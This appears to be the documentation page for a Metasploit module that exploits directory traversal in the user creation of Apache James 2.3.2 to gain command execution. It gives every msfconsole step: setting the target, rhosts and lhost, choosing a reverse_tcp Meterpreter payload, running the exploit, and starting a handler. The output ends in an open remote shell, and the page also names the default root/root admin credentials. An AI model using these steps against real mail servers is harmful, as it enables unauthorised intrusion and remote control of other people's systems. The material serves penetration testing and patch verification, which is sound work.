## Vulnerable Application  
  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
  
## Verification Steps  
  1. Load the module:  
```
  msf5 > use exploit/linux/smtp/apache_james_exec  
```

  2. Set remote and local options:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
  target => 1  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
  rhosts => 192.168.224.164  
  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
  rport => 25  

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444  
```

  3. Set payload:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
```

  4. Check version and run exploit:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
```

  5. Set up and run listener (Can be done before running exploit):  
```
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >  
```

## Options  
  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
  **RHOSTS:**  The IP address of the vulnerable server.  
  **RPORT:**  The port number of the SMTP service.  

## Targets
```
  Id  Name 
  --  ----
  0   Linux x86  
  1   Linux x64  
```

## References  
  1. <https://www.exploit-db.com/exploits/35513>  
  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>